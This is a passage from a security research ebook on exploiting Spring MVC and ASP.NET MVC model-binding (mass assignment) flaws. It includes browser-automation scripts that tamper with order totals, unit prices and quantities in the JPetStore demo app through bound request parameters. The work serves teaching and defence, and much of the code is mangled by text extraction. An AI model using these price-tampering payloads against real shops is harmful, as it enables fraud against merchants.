Exploiting MVC

Exploiting MVC Model Binding
Dinis Cruz
This book is for sale at http://leanpub.com/Exploiting_MVC
This version was published on 2014-03-23
This is a Leanpub book. Leanpub empowers authors and publishers with the Lean Publishing process. Lean
Publishing is the act of publishing an in-progress ebook using lightweight tools and many iterations to get
reader feedback, pivot until you have the right book and build traction once you do.
This work is licensed under a Creative Commons Attribution 3.0 Unported License
Contents
1 July 2011 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
O2 Script with BlackBox exploits for Spring MVC AutoBinding vulnerabilities in JPetStore . . . . .
O2 Script for Spring MVC JPetStore - Start Servers (start/stop apache and hsqldb) . . . . . . . . .
O2 Script: Spring MVC Util - View Controllers . . . . . . . . . . . . . . . . . . . . . . . . . . . .
Creating an API for JPetStore Browser automation . . . . . . . . . . . . . . . . . . . . . . . . . . .
Injecting FirebugLite and jQuery into a IE Automation page (JPetStore Example) . . . . . . . . . .
Writing an O2 IE Automation Script for JPetStore Account Creation . . . . . . . . . . . . . . . .
Viewing JPetStore Hsqldb database and couple more Autobinding issues . . . . . . . . . . . . . . .
Finding the JSP views that are mapped to controlers in JPetStore (Spring MVC) . . . . . . . . . . .
Visualizing the links in JPetStore (Spring MVC) . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
Packaged Spring MVC Security Test Apps: JPetStore and PetClinc . . . . . . . . . . . . . . . . . . .
Simple Viewer to see JSP files (example using Spring MVC SPetStore) . . . . . . . . . . . . . . . .
Util - Java, Jsp and Xml File Search (Example using Spring MVC JPetStore) . . . . . . . . . . . . .
Visualizing Spring MVC Annotations based Controls (and Autobinding PetClinics vulnerabilities) .
1
2
5
6
7
8
10
12
14
17
18
19
20
21
2 September 2011 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
example of spring mvc controllers . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
25
26
3 November 2011 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
Fixing one of JPetStores AutoBinding Vulnerabilities (changing the purchase price) . . . . . . . . .
27
28
4 May 2012 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
ASP.NET MVC MUSIC STORE . . . . . . . . . . . . . . . . . . . .
Order details . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
HTTP form post fields using Fiddler . . . . . . . . . . . . . . . . . .
Checkout controller . . . . . . . . . . . . . . . . . . . . . . . . . . .
Exploiting Microsoft MVC vulnerabilities using OWASP O2 Platform
.
.
.
.
.
.
32
33
34
35
36
37
5 June 2013 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
Using ASP.NET MVC 4.0 in TeamMentor (with simple Controller, View and master Layout) . . . .
39
40
6 July 2013 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
Can you spot the security implications/vulnerability of a small change to an ASP.NET MVC 3.0+
Model Binder? . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
Nice business logic vulnerability and CSRF on the ASP.NET MVC Design Patterns book sample . .
Day 1 - made it to Vegas, start of ASP.NET MVC research . . . . . . . . . . . . . . . . . . . . . . .
MVC ModelBinding Vulnerability in Contoso University sample (first raw PoC) . . . . . . . . . . .
45
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
46
51
58
59
CONTENTS
7 October 2012 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
Tool - O2 Cmd SpringMVC v1.0.exe - as standalone exe . . . . . . .
How the Tool - O2 Cmd SpringMVC v1.0.exe was created . . . . . .
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
63
64
65
68
8 December 2012 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
ASP.NET MVC XSS and AutoBind Vulns in MVC Example app (from 2008) . . . . . . . . . . . .
ASP.NET Support in SAST and IBM F4F . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
70
71
72
9 January 2013 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
OData ASP.NET Web API: An Mass Assignment vulnerability in the making? . . . . . . . . . . . .
Should Mass Assignment be an OWASP Top 10 Vulnerability? . . . . . . . . . . . . . . . . . . . .
74
75
78
10 September 2008 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
ASP.NET MVC XSS and AutoBind vulns in MVC Example . . . . . . . . . . . . . . . . . . . . .
80
81
11 September 2009 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
Spring MVC 3.0 MVC Binding rules . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
Finally here is how I have been analysing Spring MVC apps using O2 . . . . . . . . . . . . . . .
Reaching out to Spring Developers . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
Couple more blog posts on JPetStore and additional Spring MVC Autobinding vulnerabilities . . . .
Visualizing Spring MVC Annotations based Controls (and Autobinding PetClinics vulnerabilities) .
Current O2 support for analyzing Spring MVC . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
What needs to be done to map Static Analysis Traces from Controllers and Views . . . . . . . . . .
82
83
86
88
89
90
91
92
12 October 2011 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
Why doesnt SAST have better Framework support (for example Spring MVC)? . . . . . . . . .
What does SAST mean? And where does it come from? . . . . . . . . . . . . . . . . . . . . . .
First Answer to: Why doesnt SAST have better Framework support (for example Spring MVC)?
Solution for fixing Springs JPetStore AutoBinding vulnerabilities . . . . . . . . . . . . . . . . .
.
.
.
.
.
. 94
. 95
. 96
. 97
. 101
13 April 2012 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
Some proposed Visions for next OWASP Summit . . . . . . . . . . . . . . . . . . . . . . . .
Why ASP.NET MVC is insecure by design , just like Spring MVC (and why SAST can help)
Starting to use the O2 Spring MVC viewer on ThreadFix . . . . . . . . . . . . . . . . . . . .
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
102
103
104
105
1 July 2011
July 2011
O2 Script with BlackBox exploits for Spring MVC AutoBinding

vulnerabilities in JPetStore
This script ( that you can find on your local O2 Scripts folder at C:O2O2Scripts_Database_Scripts_Sample_Vulnerabilities\jPetStoreJpetStore - BlackBox Exploits.h2) shows a blackbox aninimation of a couple Spring
MVC Autobinding vulnerabilities in the JPetStore application.
You can see a video of this script in action here: [youtube=http://www.youtube.com/watch?v=yzTExpNZ2bw]
Also see this blog post for more details: http://diniscruz.blogspot.com/2011/07/two-security-vulnerabilities-inspring.html (includes a link to a white paper in this topic published in 2008 (but still very relevant))
Here is the source code of the O2 Script that creates a PoC GUI and allows the controlled execution of 3
variations of the exploits:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
var topPanel = "JPetStore 'AutoBinding Vulnerability' PoC".popupWindow(1000,700);

//var topPanel = panel.clear().add_Panel();
var actionPanel = topPanel.insert_Above(40);
var ie = topPanel.add_IE_with_NavigationBar().silent(true);
var server = "http://127.0.0.1.:8080";
Action<string,string> login = (username, password) =>
{
ie.open(server + "/jpetstore/shop/signonForm.do");
ie.field("username",username);
ie.field("password",password);
ie.buttons()[1].click();
};
Action loginPlaceAnOrderAndGoToCheckout = ()=>
{
ie.open("http://127.0.0.1:8080/jpetstore");
ie.link("Enter the Store").click();
//login if needed
var signOffLink = ie.links().where((link)=> link.url().contains("signonForm.do")).\
first();
if(signOffLink.notNull())
{
signOffLink.click(); login("j2ee", "pwd1");
}
ie.links().where((link)=> link.url().contains("FISH"))[0].click();
ie.link("FI-FW-01 ").flash().click(); ie.links().where((link)=> link.url().contain\
s("addItemToCart"))[0].flash().click();
ie.links().where((link)=> link.url().contains("checkout.do"))[0].flash().click();
ie.links().where((link)=> link.url().contains("newOrder.do"))[0].flash().click();
};
Action scrollToTotal = ()=>
{
var tdElement = ie.elements().elements("TD").toList().Where((element)=> element.in\
July 2011
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
nerHtml().notNull() && element.innerHtml().contains("Total:")).first();

tdElement.scrollIntoView();
tdElement.injectHtml_beforeEnd("<h2><p align=right>Look at the Total value from th\
e table above (it should be 18.50)</p><h2>");
};
Action<string> exploit_Variation_1 = (payload) =>
{
loginPlaceAnOrderAndGoToCheckout(); ie.buttons()[1].flash().click();
ie.open(server + "/jpetstore/shop/newOrder.do?_finish=true&" + payload); scrollToT\
otal();
};
Action<string> exploit_Variation_1_SetTotalPrice = (totalPrice) =>
{
var payload = "&order.totalPrice={0}".format(totalPrice); exploit_Variation_1(payl\
oad);
};
Action<string> exploit_Variation_1_SetItemPriceQuantityAndTotalPrice = (totalPrice) =>
{
var payload = "&order.totalPrice={0}&order.lineItems[0].unitPrice=12&order.lineIte\
ms[0].quantity=12".format(totalPrice); exploit_Variation_1(payload);
};
Action<string> exploit_Variation_2 = (totalPrice) =>
{
loginPlaceAnOrderAndGoToCheckout();
ie.field("order.billToFirstName").flash() .injectHtml_afterEnd("<br>Total Price:<i\
nput type=text name='order.totalPrice' value='{0}'/>".format(totalPrice));
ie.buttons()[1].flash().click();
ie.open("http://127.0.0.1.:8080/jpetstore/shop/newOrder.do?_finish=true");
scrollToTotal();
};
//ie.disableFlashing();
var desiredPrice = "";
actionPanel.add_Label("Desired Total Price:").top(4)
.append_TextBox("").onTextChange((text) => desiredPrice = text).set_Text("1.99")
.append_CheckBox("Disable flashing",(value)=>
{
if (value)
ie.disableFlashing();
else
ie.enableFlashing();
})
.append_Link("Normal Request", ()=> exploit_Variation_1("")).top(24).left(105)
.append_Link("Exploit Variation #1 (set TotalPrice) ", ()=> exploit_Variation_1_SetTot\
alPrice(desiredPrice))
.append_Link("Exploit Variation #2 (set ItemPrice, Item Quantity and TotalPrice) ", ()\
July 2011
78
79
80
81
82
83
84
85
86
87
88
=> exploit_Variation_1_SetItemPriceQuantityAndTotalPrice(desiredPrice))
.append_Link("Exploit Variation #3 (set TotalPrice) ", ()=> exploit_Variation_2(desire\
dPrice))
.append_Link("Exploit Variation #3 (set TotalPrice) ", ()=> exploit_Variation_2(desire\
dPrice))
.append_Link("loginPlaceAnOrderAndGoToCheckout; ",()=> loginPlaceAnOrderAndGoToCheckou\
t());
ie.open("http://127.0.0.1.:8080/jpetstore"); return "done";
//O2File:WatiN_IE_ExtensionMethods.cs
//using O2.XRules.Database.Utils.O2
//O2Ref:WatiN.Core.1x.dll
July 2011
O2 Script for Spring MVC JPetStore - Start Servers (start/stop

apache and hsqldb)
Part of the Spring MVC O2 demos, this script will:
Create a Gui to allow easy start and stop of the JPetStore servers (web and db)
Shows how to start an apache server and hsqldb directly (i.e. without using *.bat files)
Provide links to the other jPetStore Spring MVC *.h2 scripts
Here is a video of this script in action: [youtube=http://www.youtube.com/watch?v=8Y_zvzLGNtg] This
script is included in the jPetStore O2 Demo Pack which can be downloaded from here (includes JPetStore and
Apache): Here is the script: [sourcecode language=csharp wraplines=false] var topPanel = O2Gui.open
July 2011
O2 Script: Spring MVC Util - View Controllers
This Script creates a view for the Spring MVC mapping objects created by the SpringMvcMappings_v2
API. This is a very important script since it provides a very clear view of a Spring MVC application
URLs, Controllers and CommandClass The Command Class view can be quite spectacular since it is
common to find massive AutoBinded POJOs (some even with recursion) Here is a video showing this script
in action: [youtube=http://www.youtube.com/watch?v=ZQd7xqAlSRc] Here is the code: [sourcecode language=csharp wraplines=false] var topPanel = O2Gui.open<Panel>("Spring MVC Util - View
Controllers",1000,400); //var topPanel = panel.clear().add_Panel();</pre>   var baseDir =
PublicDI.CurrentScript.directoryName(); var xmlFile = baseDir.pathCombine(@"sourceCode\warWEBINF\petstore-servlet.xml"); var mcvMappingsFile = "{0}.mvcMappings.xml".format(xmlFile);
var webAppClassFiles = baseDir.pathCombine("jPetStore.classes.zip.xml"); var coreClassFiles =
baseDir.pathCombine("jPetStore.classes.zip.xml"); Func<string,string,string> resolveGetterReturnType = (methodName, returnType) => { "in resolveGetterReturnType: {0} - {1}".debug(methodName,
returnType); if (methodName =="getLineItems") return "org.springframework.samples.jpetstore.domain.Line
return returnType; }; var mvcMappings = (mcvMappingsFile.fileExists()) ? mcvMappingsFile.load<SpringMvcMappings>()
: xmlFile.springMvcMappings() .mapCommandClass_using_XRefs(webAppClassFiles); var xRefs = coreClassFiles.javaMetadata().map_JavaMetadata_XRefs(); var byCommandClass = mvcMappings.controllers_by_CommandClass(); var treeView = topPanel.add_TreeView_with_PropertyGrid(true).sort(); var codeViewer =
topPanel.insert_Right().add_SourceCodeViewer(); Action<string> onClassSelected = (@class) => { if
(xRefs.Classes_by_Signature.hasKey(@class)) codeViewer.open(xRefs.Classes_by_Signature[@class].file()); };
var _treeView = codeViewer.insert_Above().add_TreeView_For_CommandClasses_Visualization(xRefs, onClassSelected, resolveGetterReturnType); treeView.afterSelect<String>( (javaClass)=>{ if (javaClass.valid()
&& javaClass !="[no commandName]") { var file = "{0}.java".format(javaClass.replace("
_treeView.clear(); _treeView.add_Node(javaClass, javaClass,true); codeViewer.open(file); } else codeViewer.set_Text(""); }); treeView.afterSelect<SpringMvcController>( (mvcController)=>{ if (mvcController.FileName.valid()) codeViewer.open(mvcController.FileName); _treeView.clear(); if (mvcController.CommandClass.valid(
_treeView.add_Node(mvcController.CommandClass, mvcController.CommandClass,true); }); var byCommandClassNode = treeView.add_Node("by CommandClass"); foreach(var mapping in byCommandClass) byCommandClassNode.add_Node(mapping.Key,mapping.Key) .add_Nodes(mapping.Value); var byJavaClassNode = treeView.add_Node("by JavaClass"); foreach(var mapping in mvcMappings.controllers_by_JavaClass()) byJavaClassNode.add_Node(mapping.Key,mapping.Value); var byUrlNode = treeView.add_Node("by Url"); foreach(var controller in mvcMappings.Controllers) byUrlNode.add_Node(controller.HttpRequestU
treeView.focus(); return "ok"; //using O2.XRules.Database.Languages_and_Frameworks.J2EE //using O2.XRules.Database.APIs.IKVM //O2File:spring-servlet-2.0.xsd.cs //O2File:SpringMvcMappings_v2.0.cs
//O2Ref:O2_Misc_Microsoft_MPL_Libs.dll [/sourcecode]
July 2011
Creating an API for JPetStore Browser automation
Once we have a number of Lambda functions to perform IE/Web automation, the next step is to create
an API so that they can be easily consumed and reused. This API is going to be called API_JPetStore.cs
and will allow the simple invocation of JPetStore commands like this: [sourcecode language=csharp
wraplines=false] var topPanel = panel.clear().add_Panel(); var ie = topPanel.add_IE().silent(true); var
jPetStore = new API_JPetStore(ie); jPetStore.homePage(); jPetStore.login_DefaultValues(); jPetStore.logout();
jPetStore.login(asd,asd); jPetStore.login(j2ee,j2ee);</pre> //O2File:API_JPetStore.cs //O2File:WatiN_IE_ExtensionMethods.cs //using O2.XRules.Database.Utils.O2 //O2Ref:WatiN.Core.1x.dll [/sourcecode] Here
is the current source code for the API_JPetStore.cs file (at the moment only implemeting a couple functions (like the login and logout) [sourcecode language=csharp wraplines=false] // This file is part
of the OWASP O2 Platform () and is released under the Apache 2.0 License () using System; using
System.Linq; using System.Collections.Generic; using O2.Kernel; using O2.Kernel.ExtensionMethods; using
O2.DotNetWrappers.DotNet; using O2.DotNetWrappers.ExtensionMethods; //O2File:WatiN_IE_ExtensionMethods.cs //O2File:WatiN_IE.cs //O2Ref:WatiN.Core.1x.dll</pre> namespace O2.XRules.Database.APIs {
public class API_JPetStore { public WatiN_IE ie; public string appUrl = ; public API_JPetStore(WatiN_IE
_ie) { ie = _ie; } public API_JPetStore open(string virtualPath) { if (virtualPath.starts(/).isFalse()) virtualPath
= /{0}.format(virtualPath); var fullUri = {0}{1}.format(appUrl, virtualPath).uri(); ie.open(fullUri.str()); return
this; } } public static class API_JPetStore_ExtensionMethods { public static API_JPetStore homePage(this
API_JPetStore jPetStore) { jPetStore.open(); return jPetStore; } public static API_JPetStore login_DefaultValues(this API_JPetStore jPetStore) { jPetStore.open(/shop/signonForm.do); jPetStore.ie.buttons()[1].click(); return jPetStore; } public static bool login(this API_JPetStore jPetStore, string username, string password) { jPetStore.open(/shop/signonForm.do); var ie = jPetStore.ie; ie.field(username).value(username); ie.field(password).value(passw
jPetStore.ie.buttons()[1].click(); return ie.IE.Html.contains(Invalid username or password. Signon failed.); }
public static API_JPetStore logout(this API_JPetStore jPetStore) { jPetStore.open(/shop/signoff.do); return
jPetStore; } } } [/sourcecode]
July 2011
Injecting FirebugLite and jQuery into a IE Automation page

(JPetStore Example)
When doing IE Automation, sometimes the best way to find out what is happening at the page were working
on is to open FireBug on it. A cool (and very powerfull) alternative is to use FirebugLite which can be embeded
on any page and works on most browsers. As you can see here http://getfirebug.com/firebuglite#Stable one
way to fireup FirebugLite is to execute that bit of Javascript they show under the Add the following link to
your bookmarks: section. When using O2s IE Automation this can be achieved like this: [sourcecode language=csharp wraplines=false] var firebugLiteScript = "(function(F,i,r,e,b,u,g,L,I,T,E){if(F.getElementById(b))return;E=
Image;Er;})(document,createElement,setAttribute,getElementsByTagName,FirebugLite,4,firebug-lite.js,releases/lite/latest
ie.eval(firebugLiteScript ); [/sourcecode] And since that works, lets add it as an Extension method to the
WatiN_ExtensionMethods.cs file that is used on the IE Automation script: [sourcecode language=csharp
wraplines=false] public static class WatiN_IE_ExtensionMethods_FireBugLite { public static WatiN_IE inject_FirebugLite(this WatiN_IE ie) { var firebugLiteScript = "(function(F,i,r,e,b,u,g,L,I,T,E){if(F.getElementById(b))return;E
Image;Er;})(document,createElement,setAttribute,getElementsByTagName,FirebugLite,4,firebug-lite.js,releases/lite/latest
ie.eval(firebugLiteScript); return ie; } } [/sourcecode] While we are here lets also add jQuery directly (without
the need to use the IE_JQuery.cs api) [sourcecode language=csharp wraplines=false] ie.eval("<a
href="http://code.jquery.com/jquery-1.6.2.min.js%22.uri().getHtml">http://code.jquery.com/jquery1.6.2.min.js".uri().getHtml</a>()); [/sourcecode] or as an extension method: [sourcecode language=csharp wraplines=false] public static class WatiN_IE_ExtensionMethods_JQuery { public static
WatiN_IE inject_jQuery(this WatiN_IE ie) { ie.eval("<a href="http://code.jquery.com/jquery1.6.2.min.js%22.uri().getHtml">http://code.jquery.com/jquery-1.6.2.min.js".uri().getHtml</a>());
return ie; } } [/sourcecode] Puting it all together, here is a script that:
opens up JPetStore
Injects FirebugLite
Injects jQuery
runs a jQuery command that:
selects an a with the content Enter the Store
changes its border to 2px
changes it size to 20px
fades it out in 2000 ms
fades is it in 2000 ms
[sourcecode language=csharp wraplines=false] var topPanel = panel.clear().add_Panel(); var ie = topPanel.add_IE().silent(true); var jPetStore = new API_JPetStore(ie); jPetStore.homePage(); ie.inject_FirebugLite();
ie.inject_jQuery(); ie.eval("jQuery(\"a:contains(Enter the Store)\").css({border: solid 10px,
font-size : 30 } ).fadeOut(2000).fadeIn(2000);");</pre>   //O2File:API_JPetStore.cs //O2File:WatiN_IE_ExtensionMethods.cs //using O2.XRules.Database.Utils.O2 //O2Ref:WatiN.Core.1x.dll [/sourcecode] Here
July 2011
is a screenshot what what this looks like:
July 2011
10
Writing an O2 IE Automation Script for JPetStore Account

Creation
Here is a video and script of the interactive process of writing an O2 IE Automation Script for JPetStore.
[youtube=http://www.youtube.com/watch?v=J4Ojqzb6qsw] This is is the original script as shown in the
video: [sourcecode language=csharp wraplines=false] panel.clear(); var ie = panel.add_IE().silent(true);</pre>
//ie.open(http://localhost:8080/jpetstore); //ie.link(Enter the Store).click(); ie.open(http://localhost:8080/jpetstore/shop/new
ie.field(account.username).value(a user); ie.field(account.password).value(pwd); ie.field(repeatedPassword).value(pw
ie.field(account.firstName).value(first); ie.field(account.lastName).value(name); ie.field(account.address1).value(1);
ie.field(account.phone).value(2); ie.field(account.city).value(3); ie.field(account.state).value(4); ie.field(account.zip
ie.field(account.country).value(6); ie.field(account.email).value(7); ie.button(Save Account Information).click(); //return ie.buttons(); //ie.inject_FirebugLite(); //return ie.links(); //O2File:WatiN_IE_ExtensionMethods.cs //using O2.XRules.Database.Utils.O2 //O2Ref:WatiN.Core.1x.dll [/sourcecode] Which was then
added to the API_JPetStore.cs as a couple createAccount() extension methods: [sourcecode language=csharp
wraplines=false] public static API_JPetStore createAccount(this API_JPetStore jPetStore, string username,
string password) { return jPetStore.createAccount(username, password, username,10.randomLetters(),10.randomLetters(),
10.randomLetters(),10.randomLetters(),10.randomLetters(), 10.randomLetters(),10.randomLetters(),10.randomLetters());
} public static API_JPetStore createAccount(this API_JPetStore jPetStore, string username, string password ,
string firstName, string lastName, string address1, string phone, string city, string state, string zip, string country, string email) { jPetStore.open(/shop/newAccount.do); var ie = jPetStore.ie; ie.field(account.username).value(username);
ie.field(account.password).value(password); ie.field(repeatedPassword).value(password); ie.field(account.firstName).valu
ie.field(account.lastName).value(lastName); ie.field(account.address1).value(address1); ie.field(account.phone).value(pho
ie.field(account.city).value(city); ie.field(account.state).value(state); ie.field(account.zip).value(zip); ie.field(account.coun
ie.field(account.email).value(email); ie.button(Save Account Information).click(); return jPetStore; } [/sourcecode] So that they can be easily consumed like this: [sourcecode language=csharp wraplines=false]
panel.clear(); var ie = panel.add_IE().silent(true);</pre>
var jPetStore = new API_JPetStore(ie); jPetStore.createAccount(user12,pwd); //create user jPetStore.logout(); // logout jPetStore.login(user12,pwd____); //should fail (wrong password) jPetStore.login(user12,pwd); //should work //O2File:API_JPetStore.cs //O2File:WatiN_IE_ExtensionMethods.cs //using O2.XRules.Database.Utils.O2 //O2Ref:WatiN.Core.1x.dll
[/sourcecode] Here is a screenshot of the user created with the script above (note the random values)
July 2011
11
July 2011
12
Viewing JPetStore Hsqldb database and couple more Autobinding

issues
Included in the hsqldb folder is a file called manager.bat which can be used to connect to the live (in
memory) JPetStore database. Here are the settings needed (select HSQL Database Engine Server and
use jdbc:hsqldb:hsql://localhost:9002 as the URL value):
Here is a sample query:
13
July 2011
1
2
3
Here are a couple more Autobinding issues

[sourcecode language="csharp" wraplines="false"]
var ie = topPanel.add_IE_with_NavigationBar().silent(true);
4
5
6
7
8
9
Action scrollToTotal =
()=>{
var tdElement = ie.elements().elements("TD").toList().Where((element)=> elemen\
t.innerHtml().notNull() && element.innerHtml().contains("Total:")).first();
tdElement.scrollIntoView();
\
10
11
};
12
13
14
15
16
17
18
19
20
//var _payload = "order.totalPrice=1111&" + "order.lineItems[0].unitPrice=12"; // works

//var _payload = "order.totalPrice=1111&" + "order.lineItems[0].itemId=AA"; // throws err\
or
//var _payload = "order.totalPrice=1111&" + "order.lineItems[0].itemId=EST-6"; // takes t\
he inventory from EST-6 and not EST-4
var _payload = "order.totalPrice=1111&" + "order.lineItems[0].item.product.name=AAAABBBB";\
// changes the visible product name</pre>

21
22
23
24
25
26
27
28
var jPetStore = new API_JPetStore(ie);

jPetStore.homePage();
jPetStore.loginPlaceAnOrderAndGoToCheckout();
ie.buttons()[1].flash().click();
jPetStore.open("/shop/newOrder.do?_finish=true&" + _payload);
scrollToTotal();
[/sourcecode]
July 2011
14
Finding the JSP views that are mapped to controlers in JPetStore

(Spring MVC)
One of the topics that was discussed at yesterdays O2 WebCast was how to find the JSPs that are mapped to
a controler? This is a very important piece of the puzzle since that is one of the few ways we can try to have
a fell for the size of the Spring Auto-Binding vulnerabilities (since one of the analysis that needs to be done is
the cross-check between what is on the *.jsps and what the Spring MVC engine will autobind into the assigned
CommandClass POJO. The first place to look is on the Spring config file, and here is a script that does exactly
that: [sourcecode language=csharp wraplines=false] var topPanel = panel.clear().add_Panel(); var springConfig = @C:O2Demos\jPetStore - O2 Demo Pack\sourceCode\warWEB-INF\petstore-servlet.xml;</pre>
springConfig.showInCodeViewer(); //topPanel.add_SourceCodeViewer().open(springConfig); var data = from
controller in springConfig.springMvcMappings().Controllers from property in controller.Properties select
new { controler = controller.HttpRequestUrl , key = property.Key, value = property.Value }; topPanel.add_TableList().show(data); //return springConfig.springMvcMappings().Controllers[0].Properties[0]; //using O2.XRules.Database.L
and_Frameworks.J2EE //using O2.XRules.Database.APIs.IKVM //O2File:spring-servlet-2.0.xsd.cs //O2File:SpringMvcMappings
v2.0.cs //O2Ref:O2Misc_Microsoft_MPL_Libs.dll [/sourcecode] When executed this script will open up the local
petstore-servlet.xml config file and show a mapping the bean URLs and its property values
As the table created clearly shows, in this application (and this tend to be unique per app) we cant use the
spring config file to fully map the Controllers views (there are a couple that can be resolved using this method,
but there are a lot of missing mappings). A quick look at one of the controlllers shows the most likely solution
Which is the fact that the view seems to

be set by the contructor of the ModeAndView object: [sourcecode language=csharp wraplines=false] return
new ModelAndView(ViewOrder, model); [/sourcecode] The question now is: How often was this pattern used
July 2011
15
in JPetStore?. A first look looks that is common
Which is confirmed when looking at the other ModelAndView constructors:

So to correctly map these Jsps we are going to have to programatically retrieve the first string value of the ModelAndView constructor and map it to the correct controller. This can be done using the metadata that is exposed
from the O2 Java Static Analysis Engine (in the screenshot below note the string value two instructions before
July 2011
16
the call to the ModelAndView constructor):

Once we have the Jsps we will need to find the fields that are used inside that Jsps. At the moment O2 doesnt
have a JSP file parser, but this information should be also retrivable from the created *.class files, which
in this case can be found in Tomcats temp folder (C:O2Demos\jPetStore - O2 Demo Pack\apache-tomcat-
7.0.16\workCatalina\localhost\jpetstore\org\apache\jspWEB002dINF\jsp\spring):
July 2011
17
Visualizing the links in JPetStore (Spring MVC)

One of the pains of writing web automation scripts for JPetStore is its almost lack of HTML ID tags, which
make it very hard to get strong references to the desired (for example) links. The script below show an IE
Automation sequence that will end up in a page where we will grab the links and visualize a possible analysis of
its link data:

Here is the script that creates
the GUI: [sourcecode language=csharp wraplines=false] var topPanel = panel.clear().add_Panel(); var ie =
topPanel.add_IE().silent(true); ie.open(http://127.0.0.1.:8080/jpetstore); ie.link(Enter the Store).click(); var
mappings = new Dictionary<string, string>(); foreach(var url in ie.links().urls()) if(url.contains(categoryId))
mappings.add(url.split(=)[1], url); ie.open(mappings[FISH]); ie.link(FI-FW-01 ).click(); var tableList =
topPanel.insert_Left(400).add_TableList(); var urls = from url in ie.links().urls() where url.contains(?) select url.replace(?,=); var results = from url in urls select new { address = url.split(=)[0], action =
url.split(=)[1], id = url.split(=)[2] }; tableList.show(results); //ie.inject_jQuery(); //ie.inject_FirebugLite();
//return ie.fields(); return ok; //O2File:WatiN_IE_ExtensionMethods.cs //using O2.XRules.Database.Utils.O2
//O2Ref:WatiN.Core.1x.dll [/sourcecode] Here is a follow-up script where we create a dictionary that maps the
product type to a link: [sourcecode language=csharp wraplines=false] var topPanel = panel.clear().add_Panel(); var ie = topPanel.add_IE().silent(true); ie.open(http://127.0.0.1.:8080/jpetstore); ie.link(Enter the
Store).click(); var mappings = new Dictionary<string, string>(); foreach(var url in ie.links().urls()) if(url.contains(categoryId))
mappings.add(url.split(=)[1], url); ie.open(mappings[FISH]); ie.link(FI-FW-01 ).click(); //O2File:WatiN_IE_ExtensionMethods.cs //using O2.XRules.Database.Utils.O2 //O2Ref:WatiN.Core.1x.dll [/sourcecode]
July 2011
18
Packaged Spring MVC Security Test Apps: JPetStore and PetClinc

If you are looking to learn about Spring MVC Security, one of the best places to start are the test applications
that are included with Spring MVC since they contain a number of Security Vulnerabilities that are common
in Spring MVC apps (namely the AutoBinding vulnerabilties) The JPetstore files can be downloaded from:
jPetStore - O2 Demo Pack.zip The PetClinic files can be downloaded from jPetClinic - O2 Demo Pack.zip
This version of the JPetStore O2 Demo Pack already contains a couple *.H2 files which help with the security
testing (PetClinic will soon have them)
July 2011
19
Simple Viewer to see JSP files (example using Spring MVC

SPetStore)
Here is a simple script that creates a simple viewer for JSP files (note that this version doesnt support the
mapping of internal includes (the next version will)) This tool is available as the Util - View JSPs (simple
mode).h2 script and looks like this:
and
(note the need to map the include files)

Here is the source code: [sourcecode language=csharp wraplines=false] //var topPanel = panel.clear().add_Panel(); var topPanel = Util - View JSPs (simple mode).popupWindow(1000,300); var sourceCodeEditor =
topPanel.add_SourceCodeEditor(); var treeView = sourceCodeEditor.insert_Left
July 2011
20
Util - Java, Jsp and Xml File Search (Example using Spring MVC
JPetStore)
Here is a script that creates a regex based file search. The user can define both the file location and search filters.
This is what it looks like when using the files from JPetStore (note: above the files, the textbox on the left is a file
filter and the textbox on the right is a regex text search)

This is the source code that creates the above GUI: [sourcecode language=csharp wraplines=false] var
simpleSearch = O2Gui.open
July 2011
21
Visualizing Spring MVC Annotations based Controls (and

Autobinding PetClinics vulnerabilities)
If you are reviewing a Spring MVC aplication that uses Java Annotations to define the controllers behaviour,
you can use an older version of O2 (packaged separately) which was published a couple years ago, but is
still quite effective in its capabilities. You can get the installer from here or just execute the following script
to download it and start the installation process: [sourcecode language=csharp wraplines=false] var path =
http://s3.amazonaws.com/O2Downloads/O2_Cmd_SpringMvc.msi.uri().download(); path.startProcess(); [/sourcecode] Once it is installed, you will have a shortcut on your desktop called _O2_Cmd_SpringMvc.exe_ which
For the rest

when executed looks like this:
of this demo Im going to use the PetClinc Spring MVC demo app, which you can download from SpringSource or
